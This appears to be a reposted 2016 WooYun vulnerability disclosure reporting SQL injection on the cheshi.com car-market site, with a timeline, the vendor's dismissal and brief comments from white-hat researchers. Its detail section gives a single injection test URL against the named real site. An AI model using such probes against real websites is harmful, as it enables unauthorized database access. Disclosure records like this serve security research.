网上车市WWW主站存在SQL注射漏洞

admin

139580
文章

114
评论

2017年4月19日10:10:26评论230 views字数 211阅读0分42秒阅读模式

摘要

2016-04-06：细节已通知厂商并且等待厂商处理中
2016-04-06：厂商已查看当前漏洞内容,细节仅向厂商公开
2016-04-11：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(14) 关注此漏洞

缺陷编号： WooYun-2016-192170

漏洞标题：网上车市WWW主站存在SQL注射漏洞

漏洞作者：路人甲

提交时间： 2016-04-06 00:17

公开时间： 2016-04-11 00:20

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 11

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

1人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

code 区域

http://www.cheshi.com/c_ankang' AND 1=1* AND 'a'='a/

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-04-11 00:20

厂商回复：

漏洞Rank：15 (WooYun评价)

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-04-11 06:26 | 老实先生 ( 普通白帽子 | Rank:228 漏洞数:75 | 专业承揽工程刮大白，外墙涂料，外墙保温，...)

1

危害等级：无影响厂商忽略.然后默默的修补了漏洞

1# 回复此人
2016-04-11 06:49 | Freebug ( 普通白帽子 | Rank:110 漏洞数:39 | 流氓是一种高尚的职业！)

1

@老实先生经常事，哈哈

2# 回复此人
2016-04-11 10:54 | PattyBug ( 实习白帽子 | Rank:40 漏洞数:2 | 美妙世界？美妙世界！)

1

要不添加个厂商信用等级吧公开给白帽子 (⊙o⊙)

3# 回复此人
2016-04-11 16:18 | 土豆没有皮 ( 路人 | Rank:4 漏洞数:1 | 野生白帽子)

1

危害等级：无影响厂商已忽略。然后默默修复了

4# 回复此人

漏洞概要 关注数(14) 关注此漏洞

缺陷编号： WooYun-2016-192170

漏洞标题： 网上车市WWW主站存在SQL注射漏洞

相关厂商： 网上车市

漏洞作者： 路人甲